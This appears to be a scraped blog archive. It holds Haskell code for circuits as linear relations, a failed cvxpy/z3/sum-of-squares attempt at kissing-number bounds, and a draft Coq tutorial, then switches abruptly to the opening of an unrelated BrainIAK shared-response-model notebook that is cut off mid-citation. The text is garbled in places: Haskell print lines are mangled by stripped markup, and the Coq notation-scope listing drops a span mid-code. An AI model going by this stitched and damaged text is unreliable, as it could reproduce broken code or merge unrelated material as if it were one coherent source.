(bridge r2) == bridge 1 / (1/r1 + 1/r2). An open circuit allows no current to flow and ends a wire. open ~ resistor infinity open :: HLinRel IV Void open = HLinRel (fromList [[1,0]]) (konst 0 1) At branching points, the voltage is maintained, but the current splits. cmerge :: HLinRel (Either IV IV) IV cmerge = HLinRel (fromList [[1, 0, 1, 0, -1, 0], [0,1,0,0,0 ,-1 ], [0,0,0,1, 0, -1]]) (konst 0 3) This cmerge combinator could also be built using a short == bridge 0 , composing a branch with open, and then absorbing the Void away. We can bend wires up or down by using a composition of cmerge and open. cap :: HLinRel (Either IV IV) Void cap = hcompose open cmerge cup :: HLinRel Void (Either IV IV) cup = hconverse cap ground :: HLinRel IV Void ground = HLinRel ( (1><2) [ 0 , 1 ]) (vzero 1) Voltage and current sources enforce current and voltage to be certain values vsource :: Double -> HLinRel IV IV vsource v = HLinRel ( (2><4) [ 1,0,-1, 0, 0, 1, 0, -1]) (fromList [0,v]) isource :: Double -> HLinRel IV IV isource i = HLinRel (fromList [ [1,0, -1, 0], -- current conservation [1, 0, 0, 0]]) (fromList [0,i]) Measurements of circuits proceed by probes. type VProbe = () vprobe :: HLinRel IV VProbe vprobe = HLinRel ( (2><3) [1,0,0, 0,1,-1]) (konst 0 2) Inductors and capacitors could be included easily, but would require the entries of the HMatrix values to be polynomials in the frequency $\omega$, which it does not support (but it could!). We'll leave those off for another day. We actually can determine that the rules suggested above are being followed by computation. r20 :: HLinRel IV IV r20 = resistor 20 main :: IO () main = do print (r20 == (hid <<< r20)) print (r20 == r20 <<< hid) print (r20 == (hmeet r20 r20)) print $resistor 50 == r20 <<< (resistor 30) print$ (bridge 10) <<< (bridge 10) == (bridge 5) print $v2h (h2v r20) == r20 print$ r20 <= htop print $hconverse (hconverse r20) == r20 print$ (open <<< r20) == open ### Bits and Bobbles • Homogenous systems are usually a bit more elegant to deal with, although a bit more unfamiliar and abstract. • Could make a pandas like interface for linear relations that uses numpy/scipy.sparse for the computation. All the swapping and associating is kind of fun to design, not so much to use. Labelled n-way relations are nice for users. • Implicit/Lazy evaluation. We should let the good solvers do the work when possible. We implemented our operations eagerly. We don't have to. By allowing hidden variables inside our relations, we can avoid the expensive linear operations until it is useful to actually compute on them. • Relational division = quotient spaces? • DSL. One of the beauties of the pointfree/categorical approach is that you avoid the need for binding forms. This makes for a very easily manipulated DSL. The transformations feel like those of ordinary algebra and you don't have to worry about the subtleties of index renaming or substitution under binders. • Sparse is probably really good. We have lots of identity matrices and simple rearrangements. It is very wasteful to use dense operations on these. • Schur complement https://en.wikipedia.org/wiki/Schur_complement are the name in the game for projecting out pieces of linear problems. We have some overlap. • Linear relations -> Polyhedral relations -> Convex Relations. Linear is super computable, polyhedral can blow up. Rearrange a DSL to abuse Linear programming as much as possible for queries. • Network circuits. There is an interesting subclass of circuits that is designed to be pretty composable. https://en.wikipedia.org/wiki/Two-port_network Two port networks are a very useful subclass of electrical circuits. They model transmission lines fairly well, and easily composable for filter construction. It is standard to describe these networks by giving a linear function between two variables and the other two variables. Depending on your choice of which variables depend on which, these are called the z-parameters, y-parameters, h-parameters, scattering parameters, abcd parameters. There are tables of formula for converting from one form to the others. The different parameters hold different use cases for composition and combining in parallel or series. From the perspective of linear relations this all seems rather silly. The necessity for so many descriptions and the confusing relationship between them comes from the unnecessary and overly rigid requirement of have a linear function-like relationship rather than just a general relation, which depending of the circuit may not even be available (there are degenerate configurations where two of the variables do not imply the values of the other two). A function relationship is always a lie (although a sometimes useful one), as there is always back-reaction of new connections. -- voltage divider divider :: Double -> Double -> HLinRel (Either IV IV) (Either IV IV) divider r1 r2 = hcompose (bridge r2) (hpar (resistor r1) hid) The relation model also makes clearer how to build lumped models out of continuous ones. https://en.wikipedia.org/wiki/Lumped-element_model null • Because the type indices have no connection to the actual data types (they are phantom) it is a wise idea to use smart constructors that check that the sizes of the matrices makes sense. -- smart constructors hLinRel :: forall a b. (BEnum a, BEnum b) => Matrix Double -> Vector Double -> Maybe (HLinRel a b) hLinRel m v | cols m == (ca + cb) && (size v == rows m) = Just (HLinRel m v) | otherwise = Nothing where ca = card @a cb = card @b • Nonlinear circuits. Grobner Bases and polynomial relations? • Quadratic optimization under linear constraints. Can't get it to come out right yet. Clutch for Kalman filters. Nice for many formulations like least power, least action, minimum energy principles. Edit: I did more in this direction here http://www.philipzucker.com/categorical-lqr-control-with-linear-relations/ • Quadratic Operators -> Convex operators. See last chapter of Rockafellar. • Duality of controllers and filters. It is well known (I think) that for ever controller algorithm there is a filter algorithm that is basically the same thing. • LQR - Kalman • Viterbi filter - Value function table • particle filter - Monte Carlo control • Extended Kalman - iLQR-ish? Use local approximation of dynamics • unscented kalman - ? ## Failing to Bound Kissing Numbers https://en.wikipedia.org/wiki/Kissing_number Cody brought up the other day the kissing number problem.Kissing numbers are the number of equal sized spheres you can pack around another one in d dimensions. It’s fairly self evident that the number is 2 for 1-d and 6 for 2d but 3d isn’t so obvious and in fact puzzled great mathematicians for a while. He was musing that it was interesting that he kissing numbers for some dimensions are not currently known, despite the fact that the first order theory of the real numbers is decidable https://en.wikipedia.org/wiki/Decidability_of_first-order_theories_of_the_real_numbers I suggested on knee jerk that Sum of Squares might be useful here. I see inequalities and polynomials and then it is the only game in town that I know anything about. Apparently that knee jerk was not completely wrong https://arxiv.org/pdf/math/0608426.pdf Somehow SOS/SDP was used for bounds here. I had an impulse that the problem feels SOS-y but I do not understand their derivation. One way the problem can be formulated is by finding or proving there is no solution to the following set of equations constraining the centers $x_i$ of the spheres. Set the central sphere at (0,0,0,…) . Make the radii 1. Then$\forall i. |x_i|^2 = 2^2$ and $\forall i j. |x_i - x_j|^2 \ge 2^2$ I tried a couple different things and have basically failed. I hope maybe I’ll someday have a follow up post where I do better. So I had 1 idea on how to approach this via a convex relaxation Make a vector $x = \begin{bmatrix} x_0 & y _0 & x_1 & y _1 & x_2 & y _2 & ... \end{bmatrix}$ Take the outer product of this vector $x^T x = X$ Then we can write the above equations as linear equalities and inequalities on X. If we forget that we need X to be the outer product of x (the relaxation step), this becomes a semidefinite program. Fingers crossed, maybe the solution comes back as a rank 1 matrix. Other fingers crossed, maybe the solution comes back and says it’s infeasible. In either case, we have solved our original problem. import numpy as np import cvxpy as cvx d = 2 n = 6 N = d * n x = cvx.Variable((N+1,N+1), symmetric=True) c = [] c += [x >> 0] c += [x[0,0] == 1] # x^2 + y^2 + z^2 + ... == 2^2 constraint x1 = x[1:,1:] for i in range(n): q = 0 for j in range(d): q += x1[d*i + j, d*i + j] c += [q == 4] #[ x1[2*i + 1, 2*i + 1] + x[2*i + 2, 2*i + 2] == 4] #c += [x1[0,0] == 2, x1[1,1] >= 0] #c += [x1[2,2] >= 2] # (x - x) + (y - y) >= 4 for i in range(n): for k in range(i): q = 0 for j in range(d): q += x1[d*i + j, d*i + j] + x1[d*k + j, d*k + j] - 2 * x1[d*i + j, d*k + j] # xk ^ 2 - 2 * xk * xi c += [q >= 4] print(c) obj = cvx.Maximize(cvx.trace(np.random.rand(N+1,N+1) @ x )) prob = cvx.Problem(obj, c) print(prob.solve(verbose=True)) u, s, vh = np.linalg.svd(x.value) print(s) import matplotlib.pyplot as plt xy = vh[0,1:].reshape(-1,2) print(xy) plt.scatter(xy[0], xy[1] ) plt.show() Didn’t work though. Sigh. It’s conceivable we might do better if we start packing higher powers into x? Ok Round 2. Let’s just ask z3 and see what it does. I’d trust z3 with my baby’s soft spot. It solves for 5 and below. Z3 grinds to a halt on N=6 and above. It ran for days doin nothing on my desktop. from z3 import * import numpy as np d = 2 # dimensions n = 6 # number oif spheres x = np.array([ [ Real("x_%d_%d" % (i,j)) for j in range(d) ] for i in range(n)]) print(x) c = [] ds = np.sum(x**2, axis=1) c += [ d2 == 4 for d2 in ds] # centers at distance 2 from origin ds = np.sum( (x.reshape((-1,1,d)) - x.reshape((1,-1,d)))**2, axis = 2) c += [ ds[i,j] >= 4 for i in range(n) for j in range(i)] # spheres greater than dist 2 apart c += [x[0,0] == 2] print(c) print(solve(c)) Ok. A different tact. Try to use a positivstellensatz proof. If you have a bunch of polynomial inequalities and equalities if you sum polynomial multiples of these constraints, with the inequalities having sum of square multiples, in such a way to = -1, it shows that there is no real solution to them. We have the distance from origin as equality constraint and distance from each other as an inequality constraint. I intuitively think of the positivstellensatz as deriving an impossibility from false assumptions. You can’t add a bunch of 0 and positive numbers are get a negative number, hence there is no real solution. I have a small set of helper functions for combining sympy and cvxpy for sum of squares optimization. I keep it here along with some other cute little constructs https://github.com/philzook58/cvxpy-helpers import cvxpy as cvx from sympy import * import random ''' The idea is to use raw cvxpy and sympy as much as possible for maximum flexibility. Construct a sum of squares polynomial using sospoly. This returns a variable dictionary mapping sympy variables to cvxpy variables. You are free to the do polynomial operations (differentiation, integration, algerba) in pure sympy When you want to express an equality constraint, use poly_eq(), which takes the vardict and returns a list of cvxpy constraints. Once the problem is solved, use poly_value to get back the solution polynomials. That some polynomial is sum of squares can be expressed as the equality with a fresh polynomial that is explicility sum of sqaures. With the approach, we get the full unbridled power of sympy (including grobner bases!) I prefer manually controlling the vardict to having it auto controlled by a class, just as a I prefer manually controlling my constraint sets Classes suck. ''' def cvxify(expr, cvxdict): # replaces sympy variables with cvx variables in sympy expr return lambdify(tuple(cvxdict.keys()), expr)(*cvxdict.values()) def sospoly(terms, name=None): ''' returns sum of squares polynomial using terms, and vardict mapping to cvxpy variables ''' if name == None: name = str(random.getrandbits(32)) N = len(terms) xn = Matrix(terms) Q = MatrixSymbol(name, N,N) p = (xn.T * Matrix(Q) * xn)[0] Qcvx = cvx.Variable((N,N), PSD=True) vardict = {Q : Qcvx} return p, vardict def polyvar(terms,name=None): ''' builds sumpy expression and vardict for an unknown linear combination of the terms ''' if name == None: name = str(random.getrandbits(32)) N = len(terms) xn = Matrix(terms) Q = MatrixSymbol(name, N, 1) p = (xn.T * Matrix(Q))[0] Qcvx = cvx.Variable((N,1)) vardict = {Q : Qcvx} return p, vardict def scalarvar(name=None): return polyvar([1], name) def worker(x ): (expr,vardict) = x return cvxify(expr, vardict) == 0 def poly_eq(p1, p2 , vardict): ''' returns a list of cvxpy constraints ''' dp = p1 - p2 polyvars = list(dp.free_symbols - set(vardict.keys())) print("hey") p, opt = poly_from_expr(dp, gens = polyvars, domain = polys.domains.EX) #This is brutalizing me print(opt) print("buddo") return [ cvxify(expr, vardict) == 0 for expr in p.coeffs()] ''' import multiprocessing import itertools pool = multiprocessing.Pool() return pool.imap_unordered(worker, zip(p.coeffs(), itertools.repeat(vardict))) ''' def vardict_value(vardict): ''' evaluate numerical values of vardict ''' return {k : v.value for (k, v) in vardict.items()} def poly_value(p1, vardict): ''' evaluate polynomial expressions with vardict''' return cvxify(p1, vardict_value(vardict)) if __name__ == "__main__": x = symbols('x') terms = [1, x, x**2] #p, cdict = polyvar(terms) p, cdict = sospoly(terms) c = poly_eq(p, (1 + x)**2 , cdict) print(c) prob = cvx.Problem(cvx.Minimize(1), c) prob.solve() print(factor(poly_value(p, cdict))) # global poly minimization vdict = {} t, d = polyvar([1], name='t') vdict.update(d) p, d = sospoly([1,x,x**2], name='p') vdict.update(d) constraints = poly_eq(7 + x**2 - t, p, vdict) obj = cvx.Maximize( cvxify(t,vdict) ) prob = cvx.Problem(obj, constraints) prob.solve() print(poly_value(t,vdict)) and here is the attempted positivstellensatz. import sos import cvxpy as cvx from sympy import * import numpy as np d = 2 N = 7 # a grid of a vector field. indices = (xposition, yposition, vector component) '''xs = [ [symbols("x_%d_%d" % (i,j)) for j in range(d)] for i in range(N) ] gens = [x for l in xs for x in l ] xs = np.array([[poly(x,gens=gens, domain=polys.domains.EX) for x in l] for l in xs]) ''' xs = np.array([ [symbols("x_%d_%d" % (i,j)) for j in range(d)] for i in range(N) ]) c1 = np.sum( xs * xs, axis=1) - 1 c2 = np.sum((xs.reshape(-1,1,d) - xs.reshape(1,-1,d))**2 , axis=2) - 1 print(c1) print(c2) terms0 = [1] terms1 = terms0 + list(xs.flatten()) terms2 = [ terms1[i]*terms1[j] for j in range(N+1) for i in range(j+1)] #print(terms1) #print(terms2) vdict = {} psatz = 0 for c in c1: lam, d = sos.polyvar(terms2) vdict.update(d) psatz += lam*c for i in range(N): for j in range(i): c = c2[i,j] lam, d = sos.sospoly(terms2) vdict.update(d) psatz += lam*c #print(type(psatz)) print("build constraints") constraints = sos.poly_eq(psatz, -1, vdict) #print("Constraints: ", len(constraints)) obj = cvx.Minimize(1) #sum([cvx.sum(v) for v in vdict.values()])) print("build prob") prob = cvx.Problem(obj, constraints) print("solve") prob.solve(verbose=True, solver= cvx.SCS) It worked in 1-d, but did not work in 2d. At order 3 polynomials N=7, I maxed out my ram. I also tried doing it in Julia, since sympy was killing me. Julia already has a SOS package using JuMP using SumOfSquares using DynamicPolynomials using SCS N = 10 d = 2 @polyvar x[1:N,1:d] X = monomials(reshape(x,d*N), 0:2) X1 = monomials(reshape(x,d*N), 0:4) model = SOSModel(with_optimizer(SCS.Optimizer)) acc = nothing for t in sum(x .* x, dims=2) #print(t) p = @variable(model, [1:1], Poly(X1)) #print(p) if acc != nothing acc += p * (t - 1) else acc = p * (t - 1) end end for i in range(1,stop=N) for j in range(1,stop=i-1) d = x[i,:] - x[j,:] p = @variable(model, [1:1], SOSPoly(X)) acc += p * (sum(d .* d) - 1) end end #print(acc) print(typeof(acc)) @constraint(model, acc[1] == -1 ) optimize!(model) It was faster to encode, but it’s using the same solver (SCS), so basically the same thing. I should probably be reducing the system with respect to equality constraints since they’re already in a Groebner basis. I know that can be really important for reducing the size of your problem I dunno. Blah blah blah blah A bunch of unedited trash https://github.com/peterwittek/ncpol2sdpa Peter Wittek has probably died in an avalanche? That is very sad. These notes https://web.stanford.edu/class/ee364b/lectures/sos_slides.pdf Positivstullensatz. kissing number Review of sum of squares minimimum sample as LP. ridiculous problem min t st. f(x_i) – t >= 0 dual -> one dual variable per sample point The only dual that will be non zero is that actually selecting the minimum. Hm. Yeah, that’s a decent analogy. How does the dual even have a chance of knowing about poly airhtmetic? It must be during the SOS conversion prcoess. In building the SOS constraints, we build a finite, limittted version of polynomial multiplication x as a matrix. x is a shift matrix. In prpducing the characterstic polynomial, x is a shift matrix, with the last line using the polynomial known to be zero to eigenvectors of this matrix are zeros of the poly. SOS does not really on polynomials persay. It relies on closure of the suqaring operaiton maybe set one sphere just at x=0 y = 2. That breaks some symmettry set next sphere in plane something. random plane through origin? order y components – breaks some of permutation symmettry. no, why not order in a random direction. That seems better for symmettry breaking ## Learn Coq in Y Edit: It’s up! https://learnxinyminutes.com/docs/coq/ I’ve been preparing a Learn X in Y tutorial for Coq. https://learnxinyminutes.com/ I’ve been telling people this and been surprised by how few people have heard of the site. It’s super quick intros to syntax and weirdness for a bunch of languages with inline code tutorials. I think that for me, a short description of that mundane syntactic and programming constructs of coq is helpful. Some guidance of the standard library, what is available by default. And dealing with Notation scopes, which is a pretty weird feature that most languages don’t have. The manual actually has all this now. It’s really good. Like check this section out https://coq.inria.fr/refman/language/coq-library.html . But the manual is an intimidating documents. It starts with a BNF description of syntax and things like that. The really useful pedagogical stuff is scattered throughout it. Anyway here is my draft (also here https://github.com/philzook58/learnxinyminutes-docs/blob/master/coq.html.markdown where the syntax highlighting isn’t so janked up). Suggestions welcome. Or if this gets accepted, you can just make pull requests --- language: Coq filename: learncoq.v contributors: - ["Philip Zucker", "http://www.philipzucker.com/"] --- The Coq system is a proof assistant. It is designed to build and verify mathematical proofs. The Coq system contains the functional programming language Gallina and is capable of proving properties about programs written in this language. Coq is a dependently typed language. This means that the types of the language may depend on the values of variables. In this respect, it is similar to other related languages such as Agda, Idris, F*, Lean, and others. Via the Curry-Howard correspondence, programs, properties and proofs are formalized in the same language. Coq is developed in OCaml and shares some syntactic and conceptual similiarity with it. Coq is a language containing many fascinating but difficult topics. This tutorial will focus on the programming aspects of Coq, rather than the proving. It may be helpful, but not necessary to learn some OCaml first, especially if you are unfamiliar with functional programming. This tutorial is based upon its OCaml equivalent The standard usage model of Coq is to write it with interactive tool assistance, which operates like a high powered REPL. Two common such editors are the CoqIDE and Proof General Emacs mode. Inside Proof General Ctrl+C will evaluate up to your cursor. coq (*** Comments ***) (* Comments are enclosed in (* and *). It's fine to nest comments. *) (* There are no single-line comments. *) (*** Variables and functions ***) (* The Coq proof assistant can be controlled and queried by a command language called the vernacular. Vernacular keywords are capitalized and the commands end with a period. Variable and function declarations are formed with the Definition vernacular. *) Definition x := 10. (* Coq can sometimes infer the types of arguments, but it is common practice to annotate with types. *) Definition inc_nat (x : nat) : nat := x + 1. (* There exists a large number of vernacular commands for querying information. These can be very useful. *) Compute (1 + 1). (* 2 : nat *) (* Compute a result. *) Check tt. (* tt : unit *) (* Check the type of an expressions *) About plus. (* Prints information about an object *) (* Print information including the definition *) Print true. (* Inductive bool : Set := true : Bool | false : Bool *) Search nat. (* Returns a large list of nat related values *) Search "_ + _". (* You can also search on patterns *) Search (?a -> ?a -> bool). (* Patterns can have named parameters *) Search (?a * ?a). (* Locate tells you where notation is coming from. Very helpful when you encounter new notation. *) Locate "+". (* Calling a function with insufficient number of arguments does not cause an error, it produces a new function. *) Definition make_inc x y := x + y. (* make_inc is int -> int -> int *) Definition inc_2 := make_inc 2. (* inc_2 is int -> int *) Compute inc_2 3. (* Evaluates to 5 *) (* Definitions can be chained with "let ... in" construct. This is roughly the same to assigning values to multiple variables before using them in expressions in imperative languages. *) Definition add_xy : nat := let x := 10 in let y := 20 in x + y. (* Pattern matching is somewhat similar to switch statement in imperative languages, but offers a lot more expressive power. *) Definition is_zero (x : nat) := match x with | 0 => true | _ => false (* The "_" pattern means "anything else". *) end. (* You can define recursive function definition using the Fixpoint vernacular.*) Fixpoint factorial n := match n with | 0 => 1 | (S n') => n * factorial n' end. (* Function application usually doesn't need parentheses around arguments *) Compute factorial 5. (* 120 : nat *) (* ...unless the argument is an expression. *) Compute factorial (5-1). (* 24 : nat *) (* You can define mutually recursive functions using "with" *) Fixpoint is_even (n : nat) : bool := match n with | 0 => true | (S n) => is_odd n end with is_odd n := match n with | 0 => false | (S n) => is_even n end. (* As Coq is a total programming language, it will only accept programs when it can understand they terminate. It can be most easily seen when the recursive call is on a pattern matched out subpiece of the input, as then the input is always decreasing in size. Getting Coq to understand that functions terminate is not always easy. See the references at the end of the artice for more on this topic. *) (* Anonymous functions use the following syntax: *) Definition my_square : nat -> nat := fun x => x * x. Definition my_id (A : Type) (x : A) : A := x. Definition my_id2 : forall A : Type, A -> A := fun A x => x. Compute my_id nat 3. (* 3 : nat *) (* You can ask Coq to infer terms with an underscore *) Compute my_id _ 3. (* An implicit argument of a function is an argument which can be inferred from contextual knowledge. Parameters enclosed in {} are implicit by default *) Definition my_id3 {A : Type} (x : A) : A := x. Compute my_id3 3. (* 3 : nat *) (* Sometimes it may be necessary to turn this off. You can make all arguments explicit again with @ *) Compute @my_id3 nat 3. (* Or give arguments by name *) Compute my_id3 (A:=nat) 3. (*** Notation ***) (* Coq has a very powerful Notation system that can be used to write expressions in more natural forms. *) Compute Nat.add 3 4. (* 7 : nat *) Compute 3 + 4. (* 7 : nat *) (* Notation is a syntactic transformation applied to the text of the program before being evaluated. Notation is organized into notation scopes. Using different notation scopes allows for a weak notion of overloading. *) (* Imports the Zarith module containing definitions related to the integers Z *) Require Import ZArith. (* Notation scopes can be opened *) Open Scope Z_scope. (* Now numerals and addition are defined on the integers. *) Compute 1 + 7. (* 8 : Z *) (* Integer equality checking *) Compute 1 =? 2. (* false : bool *) (* Locate is useful for finding the origin and definition of notations *) Locate "_ =? _". (* Z.eqb x y : Z_scope *) Close Scope Z_scope. (* We're back to nat being the default interpetation of "+" *) Compute 1 + 7. (* 8 : nat *) (* Scopes can also be opened inline with the shorthand % *) Compute (3 * -7)%Z. (* -21%Z : Z *) (* Coq declares by default the following interpretation scopes: core_scope, type_scope, function_scope, nat_scope, bool_scope, list_scope, int_scope, uint_scope. You may also want the numerical scopes Z_scope (integers) and Q_scope (fractions) held in the ZArith and QArith module respectively. *) (* You can print the contents of scopes *) Print Scope nat_scope. (* Scope nat_scope Delimiting key is nat Bound to classes nat Nat.t "x 'mod' y" := Nat.modulo x y "x ^ y" := Nat.pow x y "x ?= y" := Nat.compare x y "x >= y" := ge x y "x > y" := gt x y "x =? y" := Nat.eqb x y "x a end. (* A destructuring let is available if a pattern match is irrefutable *) Definition my_fst2 {A B : Type} (x : A * B) : A := let (a,b) := x in a. (*** Lists ***) (* Lists are built by using cons and nil or by using notation available in list_scope. *) Compute cons 1 (cons 2 (cons 3 nil)). (* (1 :: 2 :: 3 :: nil)%list : list nat *) Compute (1 :: 2 :: 3 :: nil)%list. (* There is also list notation available in the ListNotations modules *) Require Import List. Import ListNotations. Compute [1 ; 2 ; 3]. (* [1; 2; 3] : list nat *) (* There are a large number of list manipulation functions available, lncluding: • length • head : first element (with default) • tail : all but first element • app : appending • rev : reverse • nth : accessing n-th element (with default) • map : applying a function • flat_map : applying a function returning lists • fold_left : iterator (from head to tail) • fold_right : iterator (from tail to head) *) Definition my_list : list nat := [47; 18; 34]. Compute List.length my_list. (* 3 : nat *) (* All functions in coq must be total, so indexing requires a default value *) Compute List.nth 1 my_list 0. (* 18 : nat *) Compute List.map (fun x => x * 2) my_list. (* [94; 36; 68] : list nat *) Compute List.filter (fun x => Nat.eqb (Nat.modulo x 2) 0) my_list. (* [18; 34] : list nat *) Compute (my_list ++ my_list)%list. (* [47; 18; 34; 47; 18; 34] : list nat *) (*** Strings ***) Require Import Strings.String. Open Scope string_scope. (* Use double quotes for string literals. *) Compute "hi"%string. (* Strings can be concatenated with the "++" operator. *) Compute String.append "Hello " "World". (* "Hello World" : string *) Compute "Hello " ++ "World". (* "Hello World" : string *) (* Strings can be compared for equality *) Compute String.eqb "Coq is fun!"%string "Coq is fun!"%string. (* true : bool *) Compute ("no" =? "way")%string. (* false : bool *) Close Scope string_scope. (*** Other Modules ***) (* Other Modules in the standard library that may be of interest: • Logic : Classical logic and dependent equality • Arith : Basic Peano arithmetic • PArith : Basic positive integer arithmetic • NArith : Basic binary natural number arithmetic • ZArith : Basic relative integer arithmetic • Numbers : Various approaches to natural, integer and cyclic numbers (currently axiomatically and on top of 2^31 binary words) • Bool : Booleans (basic functions and results) • Lists : Monomorphic and polymorphic lists (basic functions and results), Streams (infinite sequences defined with co-inductive types) • Sets : Sets (classical, constructive, finite, infinite, power set, etc.) • FSets : Specification and implementations of finite sets and finite maps (by lists and by AVL trees) • Reals : Axiomatization of real numbers (classical, basic functions, integer part, fractional part, limit, derivative, Cauchy series, power series and results,...) • Relations : Relations (definitions and basic results) • Sorting : Sorted list (basic definitions and heapsort correctness) • Strings : 8-bits characters and strings • Wellfounded : Well-founded relations (basic results) *) (*** User-defined data types ***) (* Because Coq is dependently typed, defining type aliases is no different than defining an alias for a value. *) Definition my_three : nat := 3. Definition my_nat : Type := nat. (* More interesting types can be defined using the Inductive vernacular. Simple enumeration can be defined like so *) Inductive ml := OCaml | StandardML | Coq. Definition lang := Coq. (* Has type "ml". *) (* For more complicated types, you will need to specify the types of the constructors. *) (* Type constructors don't need to be empty. *) Inductive my_number := plus_infinity | nat_value : nat -> my_number. Compute nat_value 3. (* nat_value 3 : my_number *) (* Record syntax is sugar for tuple-like types. It defines named accessor functions for the components *) Record Point2d (A : Set) := mkPoint2d { x2 : A ; y2 : A }. Definition mypoint : Point2d nat := {| x2 := 2 ; y2 := 3 |}. Compute x2 nat mypoint. (* 2 : nat *) Compute mypoint.(x2 nat). (* 2 : nat *) (* Types can be parameterized, like in this type for "list of lists of anything". 'a can be substituted with any type. *) Definition list_of_lists a := list (list a). Definition list_list_nat := list_of_lists nat. (* Types can also be recursive. Like in this type analogous to built-in list of naturals. *) Inductive my_nat_list := EmptyList | NatList : nat -> my_nat_list -> my_nat_list. Compute NatList 1 EmptyList. (* NatList 1 EmptyList : my_nat_list *) (** Matching type constructors **) Inductive animal := Dog : string -> animal | Cat : string -> animal. Definition say x := match x with | Dog x => (x ++ " says woof")%string | Cat x => (x ++ " says meow")%string end. Compute say (Cat "Fluffy"). (* "Fluffy says meow". *) (** Traversing data structures with pattern matching **) (* Recursive types can be traversed with pattern matching easily. Let's see how we can traverse a data structure of the built-in list type. Even though the built-in cons ("::") looks like an infix operator, it's actually a type constructor and can be matched like any other. *) Fixpoint sum_list l := match l with | [] => 0 | head :: tail => head + (sum_list tail) end. Compute sum_list [1; 2; 3]. (* Evaluates to 6 *) (*** A Taste of Proving ***) (* Explaining the proof language is out of scope for this tutorial, but here is a taste to whet your appetite. Check the resources below for more. *) (* A fascinating feature of dependently type based theorem provers is that the same primitive constructs underly the proof language as the programming features. For example, we can write and prove the proposition A and B implies A in raw Gallina *) Definition my_theorem : forall A B, A /\ B -> A := fun A B ab => match ab with | (conj a b) => a end. (* Or we can prove it using tactics. Tactics are a macro language to help build proof terms in a more natural style and automate away some drudgery. *) Theorem my_theorem2 : forall A B, A /\ B -> A. Proof. intros A B ab. destruct ab as [ a b ]. apply a. Qed. (* We can prove easily prove simple polynomial equalities using the automated tactic ring. *) Require Import Ring. Require Import Arith. Theorem simple_poly : forall (x : nat), (x + 1) * (x + 2) = x * x + 3 * x + 2. Proof. intros. ring. Qed. (* Here we prove the closed form for the sum of all numbers 1 to n using induction *) Fixpoint sumn (n : nat) : nat := match n with | 0 => 0 | (S n') => n + (sumn n') end. Theorem sum_formula : forall n, 2 * (sumn n) = (n + 1) * n. Proof. intros. induction n. - reflexivity. (* 0 = 0 base case *) - simpl. ring [IHn]. (* induction step *) Qed. With this we have only scratched the surface of Coq. It is a massive ecosystem with many interesting and peculiar topics leading all the way up to modern research. ## Further reading * [The Coq reference manual](https://coq.inria.fr/refman/) * [Software Foundations](https://softwarefoundations.cis.upenn.edu/) * [Certfied Programming with Dependent Types](http://adam.chlipala.net/cpdt/) * [Mathematical Components](https://math-comp.github.io/mcb/) * [Coq'Art: The Calculus of Inductive Constructions](http://www.cse.chalmers.se/research/group/logic/TypesSS05/resources/coq/CoqArt/) * [FRAP](http://adam.chlipala.net/frap/) Bonus. An uneditted list of tactics. You’d probably prefer https://pjreddie.com/coq-tactics/ (*** Tactics ***) (* Although we won't explain their use in detail, here is a list of common tactics. *) (* * exact * simpl * intros * apply * assert * destruct * induction * reflexivity * rewrite * inversion * injection * discriminate * fold * unfold Tacticals * try * ; * repeat * Automatic * auto * eauto * tauto * ring * ring_simplify * psatz * lia * ria LTac is a logic programming scripting language for tactics From Tatics chapter of LF intros: move hypotheses/variables from goal to context reflexivity: finish the proof (when the goal looks like e = e) apply: prove goal using a hypothesis, lemma, or constructor apply... in H: apply a hypothesis, lemma, or constructor to a hypothesis in the context (forward reasoning) apply... with...: explicitly specify values for variables that cannot be determined by pattern matching simpl: simplify computations in the goal simpl in H: ... or a hypothesis rewrite: use an equality hypothesis (or lemma) to rewrite the goal rewrite ... in H: ... or a hypothesis symmetry: changes a goal of the form t=u into u=t symmetry in H: changes a hypothesis of the form t=u into u=t unfold: replace a defined constant by its right-hand side in the goal unfold... in H: ... or a hypothesis destruct... as...: case analysis on values of inductively defined types destruct... eqn:...: specify the name of an equation to be added to the context, recording the result of the case analysis induction... as...: induction on values of inductively defined types injection: reason by injectivity on equalities between values of inductively defined types discriminate: reason by disjointness of constructors on equalities between values of inductively defined types assert (H: e) (or assert (e) as H): introduce a "local lemma" e and call it H generalize dependent x: move the variable x (and anything else that depends on it) from the context back to an explicit hypothesis in the goal formula clear H: Delete hypothesis H from the context. subst x: For a variable x, find an assumption x = e or e = x in the context, replace x with e throughout the context and current goal, and clear the assumption. subst: Substitute away all assumptions of the form x = e or e = x (where x is a variable). rename... into...: Change the name of a hypothesis in the proof context. For example, if the context includes a variable named x, then rename x into y will change all occurrences of x to y. assumption: Try to find a hypothesis H in the context that exactly matches the goal; if one is found, behave like apply H. contradiction: Try to find a hypothesis H in the current context that is logically equivalent to False. If one is found, solve the goal. constructor: Try to find a constructor c (from some Inductive definition in the current environment) that can be applied to solve the current goal. If one is found, behave like apply c. (* Dependent types. Using dependent types for programming tasks tends to be rather unergonomic in Coq. We briefly mention here as an advanced topic that there exists a more sophistictaed match statement that is needed for dependently typed. See for example the "Convoy" pattern. *) (*** Other topics ***) (* Dependently Typed Programming - Most of the above syntax has its equivalents in OCaml. Coq also has the capability for full dependently typed programming. There is an extended pattern matching syntax available for this purpose. Extraction - Coq can be extracted to OCaml and Haskell code for their more performant runtimes and ecosystems Modules / TypeClasses - Modules and Typeclasses are methods for organizing code. They allow a different form of overloading than Notation Setoids - Termination - Gallina is a total functional programming language. It will not allow you to write functions that do not obviously terminate. For functions that do terminate but non-obviously, it requires some work to get Coq to understand this. Coinductive - Coinductive types such as streams are possibly infinite values that stay productive. *)
# Shared response model¶ Authors: Javier Turek ([email protected]), Samuel A. Nastase ([email protected]), Hugo Richard ([email protected]) This notebook provides interactive examples of functional alignment using the shared response model (SRM; Chen et al., 2015). BrainIAK includes several variations on the SRM algorithm, but here we focus on the core probabilistic SRM implementation. The goal of the SRM is to capture shared responses across participants performing the same task in a way that accommodates individual variability in response topographies (Haxby et al., 2020). Given data that is synchronized in the temporal dimension across a group of subjects, SRM computes a low dimensional shared feature subspace common to all subjects. The method also constructs orthogonal weights to map between the shared subspace and each subject's idiosyncratic voxel space. This notebook accompanies the manuscript "BrainIAK: The Brain Imaging Analysis Kit" by Kumar and colleagues (2020). The functional alignment (funcalign) module includes the following variations of SRM: #### Annotated bibliography¶ 1. Chen, P. H. C., Chen, J., Yeshurun, Y., Hasson, U., Haxby, J., & Ramadge, P. J. (2015). A reduced-dimension fMRI shared response model. In C. Cortes, N. D. Lawrence, D. D. Lee, M. Sugiyama, R. Garnett (Eds.), Advances in Neural Information Processing Systems, 